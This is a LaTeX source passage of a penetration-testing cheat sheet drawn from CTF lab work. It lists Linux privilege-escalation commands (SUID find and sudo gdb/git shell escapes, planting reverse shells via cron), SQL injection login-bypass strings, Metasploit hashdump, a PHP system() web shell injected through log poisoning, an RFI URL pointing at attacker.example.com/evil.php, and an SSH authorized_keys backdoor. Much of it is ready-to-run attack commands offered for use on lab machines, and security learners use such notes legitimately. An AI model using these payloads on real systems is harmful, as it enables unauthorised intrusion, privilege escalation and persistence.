\begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Reverse Shell \& Exploitation Techniques (cont)}} \tn % Row 12 \SetRowColor{LightBackground} \{\{fa-bolt\}\} SUID binary & \{\{fa-linux\}\} find / -perm -u=s -type f 2\textgreater{}/dev/null \{\{nl\}\}\{\{fa-linux\}\} If you want to escalate to another user, look for files that user owns or that their group can write: a cron job running as them may execute such a file, so we can drop a reverse shell into it \{\{nl\}\}\{\{fa-linux\}\} find / -user \textless{}user\_name\textgreater{} 2\textgreater{}/dev/null and find / -type d -group \textless{}group\_name\textgreater{} 2\textgreater{}/dev/null (no trailing slash after /dev/null, otherwise the redirect itself fails with "Not a directory") \{\{nl\}\}\{\{fa-linux\}\} Check every SUID hit against GTFOBins before spending time reversing it \tn % Row Count 15 (+ 15) % Row 13 \SetRowColor{white} \{\{fa-bolt\}\} CronJobs & \{\{fa-linux\}\} Transfer pspy64 through a python http.server and run it: it watches process creation without needing root, so it also catches jobs that /etc/crontab does not show (user crontabs, /etc/cron.d, systemd timers) \tn % Row Count 19 (+ 4) % Row 14 \SetRowColor{LightBackground} \{\{fa-bolt\}\} Sudo -l & \{\{fa-linux\}\} It shows exactly which commands you are authorized to run via sudo, as which target user, and whether a password is required (NOPASSWD); check each entry against GTFOBins \tn % Row Count 23 (+ 4) % Row 15 \SetRowColor{white} \{\{fa-bolt\}\} Suid binary Automation Script & \{\{fa-linux\}\} SUID3NUM.py \{\{fa-linux\}\} Custom binaries can be opened by reversing them using Ghidra (look for relative command names, e.g. system("service ...") , that can be hijacked via PATH) \tn % Row Count 28 (+ 5) % Row 16 \SetRowColor{LightBackground} Add machine IP to /etc/hosts & \{\{fa-bolt\}\} echo 10.10.194.183 spookysec.local \textgreater{}\textgreater{} /etc/hosts (run this as root on the attacking machine, e.g. via sudo sh -c '...' or sudo tee -a, since the \textgreater{}\textgreater{} redirect is opened by your own unprivileged shell) \tn % Row Count 31 (+ 3) \end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Reverse Shell \& Exploitation Techniques (cont)}} \tn % Row 17 \SetRowColor{LightBackground} Cron Jobs (time-based job scheduler) & \{\{fa-bolt\}\} Mostly we try to add our reverse shell into a script that a root cron job executes (the script, or a directory on its PATH, must be writable by us) and when CRON runs it we get the reverse shell \{\{nl\}\} \{\{fa-bolt\}\} We can even try to change /etc/hosts if the cron job is calling out to a hostname: point the name at our machine, open an HTTP server with our own reverse shell in the fetched script and let the job execute it (this needs write access to /etc/hosts on the target, or a host we can otherwise impersonate) \tn 
% Row Count 17 (+ 17) % Row 18 \SetRowColor{white} Exploiting sudo -l & \{\{fa-bolt\}\} commands - /var/www/gdb as www-data \{\{nl\}\} \{\{fa-bolt\}\} escalate privilege to a user thirtytwo then \{\{nl\}\} \{\{fa-bolt\}\} use GTFO (any sudo entry for a debugger, editor, pager or scripting runtime is a shell) \{\{fa-bolt\}\} sudo -u thirtytwo /var/www/gdb -nx -ex '!sh' -ex quit \tn % Row Count 28 (+ 11) % Row 19 \SetRowColor{LightBackground} Exploiting sudo -l & \{\{fa-bolt\}\} (d4rckh) NOPASSWD: /usr/bin/git \{\{nl\}\}\{\{fa-bolt\}\} We have a user who can run that binary as d4rckh without a password \{\{nl\}\}\{\{fa-bolt\}\} git spawns a pager, and a pager gives a shell as the target user \{\{nl\}\}\{\{fa-bolt\}\} sudo -u d4rckh /usr/bin/git -p help config (-p forces the output through the pager, less) \{\{nl\}\}\{\{fa-bolt\}\} then type !/bin/sh inside less to spawn a shell as d4rckh \tn % Row Count 41 (+ 13) \end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Reverse Shell \& Exploitation Techniques (cont)}} \tn % Row 20 \SetRowColor{LightBackground} Escalate privilege via cronjob of a python script & \{\{fa-bolt\}\} \seqsplit{https://blog.razrsec.uk/tryhackme-tartarus/} \tn % Row Count 3 (+ 3) % Row 21 \SetRowColor{white} Exploiting SUID & \{\{fa-bolt\}\} Find command which has the SUID bit set (confirm with ls -l, the s in the owner execute position), which means find runs as root. With the -exec flag as shown above, whatever we pass runs as root. Let's try out by changing the permission of root directory. \{\{nl\}\}\{\{fa-bolt\}\} \$ find . -exec chmod 777 /root \textbackslash{}; \{\{nl\}\}\{\{fa-bolt\}\} Less destructive and more useful: find . -exec /bin/sh -p \textbackslash{}; -quit gives a root shell directly (-p keeps the shell from dropping the effective uid); chmod 777 /root is noisy and hard to undo \tn % Row Count 15 (+ 12) % Row 22 \SetRowColor{LightBackground} Su VS Sudo & \{\{fa-bolt\}\} Su is Permanent privilege escalation (su): it switches to another user account entirely (you need that account's password; su with no argument means root) and stays switched until exit. \{\{nl\}\}\{\{fa-bolt\}\} Sudo is Temporary privilege escalation (sudo): it runs a single command as another user (root by default) according to the /etc/sudoers policy, authenticating with your own password, and returns to the current user directly after the execution is completed. The policy can be restricted per user and per command, which is what sudo -l shows. 
\{\{nl\}\} \{\{link="https://www.programmersought.com/article/69434807416/"\}\}Sudo-Su-Working\{\{/link\}\} \tn % Row Count 38 (+ 23) \end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Reverse Shell \& Exploitation Techniques (cont)}} \tn % Row 23 \SetRowColor{LightBackground} Privilege escalation 2 ways & \{\{fa-bolt\}\} \{\{link="https://www.hackingarticles.in/linux-privilege-escalation-using-capabilities/"\}\}Privilege escalation using capabilities\{\{/link\}\} \{\{nl\}\} \{\{fa-bolt\}\} \{\{link="https://medium.com/analytics-vidhya/python-library-hijacking-on-linux-with-examples-a31e6a9860c8"\}\}lPrivilege escalation using Python Library hijack\{\{/link\}\} \tn % Row Count 17 (+ 17) \hhline{>{\arrayrulecolor{DarkBackground}}--} \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{Upload tools and stuff - \seqsplit{https://prune2000.github.io/post/upload-tools/} \newline \newline http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet} \tn \hhline{>{\arrayrulecolor{DarkBackground}}--} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{8.4cm}{x{3.76 cm} x{4.24 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Windows cmd commands}} \tn % Row 0 \SetRowColor{LightBackground} Discover users & \{\{fa-bolt\}\} net user \tn % Row Count 1 (+ 1) % Row 1 \SetRowColor{white} Read text file & \{\{fa-bolt\}\} type root.txt \tn % Row Count 3 (+ 2) % Row 2 \SetRowColor{LightBackground} list directory content & \{\{fa-bolt\}\} dir \tn % Row Count 5 (+ 2) % Row 3 \SetRowColor{white} Change directory & \{\{fa-bolt\}\} cd \tn % Row Count 6 (+ 1) % Row 4 \SetRowColor{LightBackground} Read file permission and owner & \{\{fa-bolt\}\} Right click \textgreater{} Properties \textgreater{} Details \textgreater{} Owner \{\{fa-bolt\}\} Goto security tab \textgreater{} edit permission \textgreater{} Add 
\textgreater{} enter the name of user you want to give permission \tn % Row Count 14 (+ 8) % Row 5 \SetRowColor{white} Upgrade Command Shell to Meterpreter & sessions -u \textless{}no\textgreater{} or use use \seqsplit{post/multi/manage/shell\_to\_meterpreter} \tn % Row Count 18 (+ 4) % Row 6 \SetRowColor{LightBackground} Metasploit get hashes of users & hashdump \tn % Row Count 20 (+ 2) \hhline{>{\arrayrulecolor{DarkBackground}}--} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Linux Directory Structure}} \tn % Row 0 \SetRowColor{LightBackground} Directory Name & Usage \tn % Row Count 1 (+ 1) % Row 1 \SetRowColor{white} When basic priv esc doesnt work search these directories for Juice & \{\{fa-bolt\}\} /opt \& /var -\textgreater{} www \& log \& backups. Make sure you review Linpeas properly such as Readable files belonging to root and readable by me but not world readable \tn % Row Count 10 (+ 9) % Row 2 \SetRowColor{LightBackground} /opt & /opt is a directory for installing unbundled packages (i.e. packages not part of the Operating System distribution, but provided by an independent source), each one in its own subdirectory. \{\{nl\}\} Sometimes, we can find config files over here, having credentials. \{\{nl\}\} Thus its a Installed software locations, other dir. are /usr/local. \tn % Row Count 27 (+ 17) % Row 3 \SetRowColor{white} /var & /var contains things that are prone to change, such as websites, temporary files, config and databases. \tn % Row Count 33 (+ 6) \end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Linux Directory Structure (cont)}} \tn % Row 4 \SetRowColor{LightBackground} /bin (system commands) & /bin contains executables which are required by the system for emergency repairs, booting, and single user mode. 
\{\{nl\}\} /usr/bin contains the binaries that aren't required for that purpose. \tn % Row Count 9 (+ 9)
% Row 5
\SetRowColor{white} /usr/bin (executable commands) & This is the primary directory of executable commands on the system. \tn % Row Count 13 (+ 4)
% Row 6
\SetRowColor{LightBackground} /etc & look out for logs, backups, config files \tn % Row Count 15 (+ 2)
\hhline{>{\arrayrulecolor{DarkBackground}}--} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{OWASP TOP 10 and others}} \tn % Row 0
\SetRowColor{LightBackground} \{\{fa-exclamation-circle\}\} Vulnerability - along with its mitigation & \{\{fa-user-secret\}\} Hunt down \tn % Row Count 4 (+ 4)
% Row 1
\SetRowColor{white} \{\{fa-arrow-circle-right\}\} \{\{link="http://hwang.cisdept.cpp.edu/swanew/Text/SQL-Injection.htm"\}\}SQL injection\{\{/link\}\} & \{\{fa-bolt\}\} test' or 1=1; -{}- \{\{nl\}\}\{\{fa-bolt\}\} ' is used to close the query, ; is used to terminate, -{}- is used to comment out the rest \{\{nl\}\}\{\{fa-bolt\}\} For example ' -{}-: creating a new account blacklist' -{}- can then alter the query \tn % Row Count 16 (+ 12)
% Row 2
\SetRowColor{LightBackground} \{\{fa-arrow-circle-right\}\} Second-order-SQL & \{\{fa-bolt\}\} What happens is there is a query like \{\{nl\}\}\{\{fa-bolt\}\} UPDATE users set password="new pass" where username="blacklist ' -{}-" and password="this is for current password" \{\{nl\}\}\{\{fa-bolt\}\} Now when this query runs, everything after -{}- becomes just a comment and has no effect, so it directly changes the password of the existing user \tn % Row Count 33 (+ 17)
\end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{OWASP TOP 10 and others (cont)}} \tn % Row 3
\SetRowColor{LightBackground} \{\{fa-arrow-circle-right\}\} SQL Mitigation & \{\{fa-bolt\}\} Parameterized
Statements: Don't put the input variable directly into SQL statement, parse it separately \{\{nl\}\} \{\{fa-bolt\}\} Vulnerable : "Select * From users WHERE email = "" + email + ""; \{\{nl\}\} \{\{fa-bolt\}\} Sanitizing inputs \tn % Row Count 12 (+ 12) % Row 4 \SetRowColor{white} \mymulticolumn{2}{x{8.4cm}}{\{\{fa-arrow-circle-right\}\} SSRF} \tn % Row Count 13 (+ 1) % Row 5 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{\{\{fa-arrow-circle-right\}\} LFI / RFI} \tn % Row Count 14 (+ 1) % Row 6 \SetRowColor{white} \mymulticolumn{2}{x{8.4cm}}{\{\{fa-arrow-circle-right\}\} S3 bucket} \tn % Row Count 15 (+ 1) % Row 7 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{\{\{fa-arrow-circle-right\}\} IDOR} \tn % Row Count 16 (+ 1) \hhline{>{\arrayrulecolor{DarkBackground}}--} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Enumeration Checklist}} \tn % Row 0 \SetRowColor{LightBackground} Usage & Syntax \tn % Row Count 1 (+ 1) % Row 1 \SetRowColor{white} Attention to detail & Is something wrong like text at the end \{\{nl\}\} Everything makes sense like password \{\{nl\}\} Lookout for possible usernames, directory, information \{\{nl\}\} Focus should also be on understanding application you are enumerating and its working and what is going on \{\{nl\}\} Connect the Dots like telnet might be running an .exe which is vulnerable to BoF \tn % Row Count 19 (+ 18) % Row 2 \SetRowColor{LightBackground} Starting Enumeration & \{\{fa-bolt\}\} ifconfig \{\{fa-bolt\}\} Host discovery : nmap -sn \textless{}ip\textgreater{}/24 \{\{nl\}\} \{\{fa-bolt\}\} Explore each service running and grab banners using netcat : nc -nv \textless{}ip\textgreater{} \textless{}port\textgreater{} \{\{nl\}\} \{\{fa-bolt\}\} Finding if the service has any version based vulnerability or not via google and searchsploit \{\{nl\}\} \{\{fa-bolt\}\} What do we have and what can be done ? 
like we might have a directory already which can be further /-FUZZ- \{\{nl\}\} \{\{fa-bolt\}\} Pentest \textless{}service\textgreater{} hacktricks / hackingarticles \tn % Row Count 43 (+ 24) \end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Enumeration Checklist (cont)}} \tn % Row 3 \SetRowColor{LightBackground} HTTP / HTTPS 80 \& 443 & \{\{fa-bolt\}\} https \{\{fa-bolt\}\} robots.txt /* \{\{fa-bolt\}\} source code review \{\{fa-bolt\}\} directory enum \{\{fa-bolt\}\} vulnerability like LFI , SQL. Every vulnerability has its indicators \{\{fa-bolt\}\} extension check \{\{fa-bolt\}\} Double /-FUZZ- on paths and parameter \{\{fa-bolt\}\}\{\{nl\}\} Play with Burp, request to understand application flow \&\& Play with headers, x-forwarded-for can be used to bypass rate limit or IP ban \tn % Row Count 21 (+ 21) % Row 4 \SetRowColor{white} More Port 80 / HTTPS checklist & \{\{fa-bolt\}\} is it a CMS \{\{fa-bolt\}\} Nikto for web vulnerability scanning \{\{fa-bolt\}\} Discover if website /index.php or /index.html \{\{fa-bolt\}\} Id in URL - FUZZING can lead to dir. traversal or LFI \{\{fa-bolt\}\} If given domain name try bruteforce subdomains / vhosts \{\{fa-bolt\}\} Wildguess : If there are 2 http ports open, one service might impact other, or leak information. \{\{nl\}\} \{\{fa-bolt\}\} Login Form : Hunt for username, brute-force, SQL injection bypass on both User \& Pass Parameter = admin' OR '1'='1;-{}-+ \tn % Row Count 47 (+ 26) \end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Enumeration Checklist (cont)}} \tn % Row 5 \SetRowColor{LightBackground} FTP & \{\{fa-bolt\}\} Anonymous login \{\{fa-bolt\}\} brute force \{\{fa-bolt\}\} CVE cd... 
\{\{fa-bolt\}\} dir use it returns a full directory listing whereas the ls -al returns hidden and simplified directory listing. \{\{fa-bolt\}\} Google Version for exploits or vulnerability \{\{nl\}\} PUT command files on the server and http server to trigger \{\{fa-bolt\}\} After login, which directory you are currently in , are the files owned by root? Try cd .. \tn % Row Count 22 (+ 22) % Row 6 \SetRowColor{white} CMS & \{\{fa-bolt\}\} Hunt for admin panel \{\{fa-bolt\}\} Login Panel - Default creds for that service \& small brute-force for common creds test \{\{fa-bolt\}\} Aim for Usernames and Password\{\{fa-bolt\}\} Always read source, https , robots and dirb \{\{nl\}\} \{\{fa-bolt\}\} Always study that CMS like upload path and other important directory names \{\{nl\}\} \{\{fa-bolt\}\} FUZZ for subdomains via ffuf \{\{fa-bolt\}\} Hunt CMS Version \& Search for Exploit / Vulnerability for that version \tn % Row Count 45 (+ 23) \end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Enumeration Checklist (cont)}} \tn % Row 7 \SetRowColor{LightBackground} Directory Enumeration & \{\{fa-bolt\}\} gobuster dir -u http://10.10.97.63/ -w \seqsplit{/usr/share/wordlists/raft-large-directories-lowercase}.txt -t 40 -x php,bak,txt \{\{nl\}\} \{\{fa-bolt\}\} Always use raft and 2.3 medium wordlist for bruteforce. Remember to specify extension check. \{\{nl\}\} \{\{fa-bolt\}\} /example/\{\{fuzz\}\} : Remember to FUZZ double/directory too. 
\tn % Row Count 16 (+ 16) % Row 8 \SetRowColor{white} Service Enumeration & \{\{fa-bolt\}\} Enumerate the service \{\{nl\}\}\{\{fa-bolt\}\} Find login page like directory path for that service \{\{nl\}\}\{\{fa-bolt\}\} like where is the login page located \{\{nl\}\}\{\{fa-bolt\}\} Checkout Youtube and others for exploiting that service \tn % Row Count 28 (+ 12) % Row 9 \SetRowColor{LightBackground} Enumeration tip & \{\{fa-bolt\}\} after getting shell as www - data always check /var/www and save current user private key \seqsplit{/home/paul/.ssh/id\_rsa} and we might be able to login as another user directly \tn % Row Count 37 (+ 9) \end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Enumeration Checklist (cont)}} \tn % Row 10 \SetRowColor{LightBackground} HTTP Directory Enumeration & \{\{fa-bolt\}\} 3 Wordlists - common.txt, \seqsplit{dirbuster/directory-list-2}.3-medium.txt, \seqsplit{seclists/raft-large-directories-lowercase}.txt \{\{nl\}\}\{\{fa-bolt\}\} dirsearch -u 10.0.2.19 -w \seqsplit{/usr/share/wordlists/dirbuster/directory-list-2}.3-medium.txt -e * -t 50 \tn % Row Count 13 (+ 13) % Row 11 \SetRowColor{white} Database Penetration Testing (SqlMap) & \{\{fa-bolt\}\} Always lookout for an id in the URL, vulnerable to SQL. 
which might be using a database \{\{fa-bolt\}\} sqlmap -u \seqsplit{"http://10.0.2.6:8080/mercuryfacts/1"} -{}-dbs -{}-batch \{\{nl\}\} \{\{fa-bolt\}\} \{\{link="https://www.hackingarticles.in/database-penetration-testing-using-sqlmap-part-1/"\}\}Guide-sqlmap\{\{/link\}\} \{\{nl\}\} Enumerate login forms, id value, parameters for SQL vulnerability via burp request or sqlmap \tn % Row Count 34 (+ 21) \end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Enumeration Checklist (cont)}} \tn % Row 12 \SetRowColor{LightBackground} Upgrading a Simple Shells to Fully Interactive (TTY) & `python -c 'import pty; \seqsplit{pty.spawn("/bin/sh")'`} \tn % Row Count 3 (+ 3) % Row 13 \SetRowColor{white} Enumeration Scripts & LinEnum, Linpeas, LES , pspy64 or pspy32 \tn % Row Count 5 (+ 2) % Row 14 \SetRowColor{LightBackground} & Linux exploit suggestor \tn % Row Count 7 (+ 2) % Row 15 \SetRowColor{white} Netstat on the victim machine & \{\{fa-bolt\}\} To view incoming and outgoing connection and might find a port not coming up in scan \{\{fa-bolt\}\}\{\{nl\}\} netstat -tulpn \tn % Row Count 14 (+ 7) % Row 16 \SetRowColor{LightBackground} Sqlmap to perform enumeration (Banner Grabbing) & Capture burp request and test it on Login forms \{\{nl\}\} Command: sqlmap -r .txt file\_name -{}-dbs \tn % Row Count 19 (+ 5) % Row 17 \SetRowColor{white} SQL - important files (hacktricks), cleartext .mysql\_history in /home dir & The output comes up with the list of databases in the remote server. 
\{\{nl\}\} \seqsplit{https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/} \tn % Row Count 27 (+ 8) % Row 18 \SetRowColor{LightBackground} Cipher Identifier and Analyzer & \seqsplit{https://www.boxentriq.com/code-breaking/cipher-identifier} \tn % Row Count 30 (+ 3) \end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Enumeration Checklist (cont)}} \tn % Row 19 \SetRowColor{LightBackground} Password Hash Cracker & \seqsplit{https://crackstation}.net/ \tn % Row Count 2 (+ 2) % Row 20 \SetRowColor{white} Vigenere cipher (Long text vulnerable) & \seqsplit{https://www.guballa.de/vigenere-solver} \tn % Row Count 4 (+ 2) % Row 21 \SetRowColor{LightBackground} All in one Decoder & \seqsplit{https://gchq.github.io/CyberChef/} \tn % Row Count 6 (+ 2) % Row 22 \SetRowColor{white} Cipher and Hash identification & \{\{fa-bolt\}\} \seqsplit{https://www.rapidtables.com/convert/number/ascii-hex-bin-dec-converter.html} \{\{nl\}\}\{\{fa-bolt\}\} ASCII RANGE 60-120,ABC \{\{nl\}\}\{\{fa-bolt\}\} HEX 41 42 \{\{nl\}\}\{\{fa-bolt\}\} Decimal and Binary \{\{nl\}\}\{\{fa-bolt\}\} Base64 number and upper and lower case \{\{nl\}\}\{\{fa-bolt\}\} MD5 lower case numbers and 32 in length \tn % Row Count 22 (+ 16) % Row 23 \SetRowColor{LightBackground} Find files with common extension & find / -name *.txt 2\textgreater{}/dev/null \tn % Row Count 24 (+ 2) % Row 24 \SetRowColor{white} Hashcat & \{\{fa-bolt\}\} The crypt formats all have a prefix \{\{nl\}\}\{\{fa-bolt\}\} \$1\$ is md5crypt, \$2\$ is bcrypt, \$5\$ is sha256crypt, \$6\$ is sha512crypt \{\{nl\}\}\{\{fa-bolt\}\} Ciphey tool and hashcat wiki \tn % Row Count 34 (+ 10) \end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Enumeration Checklist (cont)}} \tn % Row 25 
\SetRowColor{LightBackground} Etc/Shadow File & \{\{fa-bolt\}\} Understanding the /etc/shadow File \{\{nl\}\}\{\{fa-bolt\}\} \seqsplit{https://linuxize.com/post/etc-shadow-file/} \tn % Row Count 6 (+ 6) % Row 26 \SetRowColor{white} THM Cryptography Room - RSA tool & \{\{fa-bolt\}\} \{\{link="https://github.com/Ganapati/RsaCtfTool"\}\}link text\{\{/link\}\} \{\{nl\}\}\{\{fa-bolt\}\} PGP stands for Pretty Good Privacy. It's a software that implements encryption for encrypting files, performing digital signing and more. and Similarly we have GPG open source and you can decrypt a file using gpg \tn % Row Count 22 (+ 16) % Row 27 \SetRowColor{LightBackground} Another tip for service enum & \{\{fa-bolt\}\} Most of privilege escalation to users after www-data is through hash or some given pass, enumerate files of that service like where is the database files stored inside this service or where is the users info stored in that service \tn % Row Count 35 (+ 13) \end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Enumeration Checklist (cont)}} \tn % Row 28 \SetRowColor{LightBackground} Copy all files into a single file & \{\{fa-bolt\}\} cat * \textgreater{} blacklist.txt \tn % Row Count 2 (+ 2) % Row 29 \SetRowColor{white} LFI / RFI Final Cheat sheet, Detailed Attack Vectors \{\{nl\}\} File Inclusion / Directory traversal \{\{nl\}\} Payload all the Things & \{\{fa-bolt\}\} \{\{link="https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File\%20Inclusion"\}\}Cheatsheet\{\{/link\}\} \{\{fa-bolt\}\} \{\{link="https://medium.com/@asfiyashaikh10/file-path-traversal-and-file-inclusions-7c567da9e226"\}\}File Inclusion Attacks\{\{/link\}\} \{\{nl\}\} \{\{fa-bolt\}\} \{\{link="https://book.hacktricks.xyz/pentesting-web/file-inclusion"\}\}File Inclusion Hacktricks\{\{/link\}\} \tn % Row Count 22 (+ 20) % Row 30 \SetRowColor{LightBackground} File 
Inclusion Attacks \{\{nl\}\} To expand, in an RFI attack, a hacker employs a script to include a remotely hosted file on the webserver. In an LFI attack, a hacker uses local files to execute a malicious script. For LFI, it is possible for a hacker to only use a web browser to carry out the attack. & \{\{fa-bolt\}\} On the other hand, Local File Inclusion (LFI) is very much similar to RFI. The only difference is that in LFI, in order to carry out the attack, instead of including remote files the attacker has to use local files, i.e.\ only files on the current server can be used to execute a malicious script. Since this form of vulnerability can be exploited using only a web browser, LFI can easily lead to remote code execution by including a file containing attacker-controlled data such as the web server's access logs (log poisoning) \{\{nl\}\}\{\{nl\}\}\{\{fa-bolt\}\} Remote File Inclusion (RFI) is a method that allows an attacker to employ a script to include a remotely hosted file on the webserver. The vulnerability promoting RFI is largely found on websites running on PHP. This is because PHP supports the ability to 'include' or 'require' additional files within a script. The use of unvalidated user-supplied input within these scripts generally leads to the exploitation of this vulnerability. \tn % Row Count 73 (+ 51)
\end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Enumeration Checklist (cont)}} \tn % Row 31
\SetRowColor{LightBackground} LFI local file inclusion & \{\{fa-bolt\}\} If you find a parameter like /index.php?plot= \{\{nl\}\}\{\{fa-bolt\}\} Try fuzzing it manually or with Burp. LFI (local file inclusion) is a vulnerability which an attacker can exploit to include/read files.
\{\{nl\}\}\{\{fa-bolt\}\} Therefore, whenever you see a PHP website try FUZZING as these are sometimes vulnerable to LFI or RFI + Use Directory Traversal \tn % Row Count 18 (+ 18) % Row 32 \SetRowColor{white} LFI vulnerability & \{\{fa-bolt\}\} Log Poisoning is a common technique used to gain a reverse shell from a LFI vulnerability. To make it work an attacker attempts to inject malicious input to the server log. \{\{nl\}\}\{\{fa-bolt\}\} add the "?page=" parameter and let's try reading the apache log file. The log file is located at the following path: \seqsplit{/var/log/apache2/access}.log \{\{nl\}\}\{\{fa-bolt\}\} Fire up Burpsuite and intercept the request and insert the following malicious code in the user agent field (The PHP command will allow us to execute system commands by parsing the input to a GET parameter called lfi) \{\{nl\}\}\{\{fa-bolt\}\} The link becomes: http://\textless{}IP\textgreater{}/lfi/lfi.php?page=/var/log/apache2/access.log\&lfi= Now you can execute commands on the system! \tn % Row Count 55 (+ 37) \end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Enumeration Checklist (cont)}} \tn % Row 33 \SetRowColor{LightBackground} Log poisoning attack vector through LFI is possible using Directory traversal and other ways like SMTP & \{\{fa-bolt\}\} Forward the request and add your parameter to the link (in my case lfi). \{\{nl\}\}\{\{fa-bolt\}\} User-Agent: Mozilla/5.0 \textless{}?php system(\$\_GET{[}'lfi'{]}); ?\textgreater{} Firefox/68.0 \{\{nl\}\}\{\{fa-bolt\}\} \seqsplit{lfi.php?page=/var/log/apache2/access.log\&lfi=cd} /home;cd lfi/;cat flag.txt;ls -lap;uname -r;ls -la \tn % Row Count 15 (+ 15) % Row 34 \SetRowColor{white} RFI/LFI (by specifying path we can even read user and root flag if server is running with root permissions) & \{\{fa-bolt\}\} Lookout for parameters and To put it another way. 
The page we're looking at is actually empty; however, it's including content from another page \{\{nl\}\}\{\{fa-bolt\}\} Local File Inclusions are when that input isn't properly sanitised, allowing us to manipulate the link to open other files; or, in case of RFI, we can supply an external URL and gain a shell \tn % Row Count 34 (+ 19)
\end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Enumeration Checklist (cont)}} \tn % Row 35
\SetRowColor{LightBackground} RFI & \{\{fa-bolt\}\} \seqsplit{http://example.com/?file=http://attacker.example.com/evil.php} \{\{nl\}\}\{\{fa-bolt\}\} In this example, the malicious file is included and run with the privileges of the user who runs the web application. That allows an attacker to run any code they want on the web server. They can even gain a persistent presence on the web server. \tn % Row Count 17 (+ 17)
% Row 36
\SetRowColor{white} Exploit SUID \& Backdoor & \{\{fa-bolt\}\} PATH of SUID binary and GTFO command together to gain root access \{\{nl\}\}\{\{fa-bolt\}\} ssh-keygen .ssh/auth-keys Leaving an SSH key in authorized\_keys on a box can be a useful backdoor \tn % Row Count 27 (+ 10)
% Row 37
\SetRowColor{LightBackground} Hash-id \& Crack Hash online otherwise use hashcat or JTR & \{\{fa-bolt\}\} \{\{link="https://md5hashing.net/hash"\}\}MD5 Hashing\{\{/link\}\} \{\{nl\}\}\{\{fa-bolt\}\} \{\{link="https://crackstation.net/"\}\}Crack-Station\{\{/link\}\} \tn % Row Count 35 (+ 8)
\end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Enumeration Checklist (cont)}} \tn % Row 38
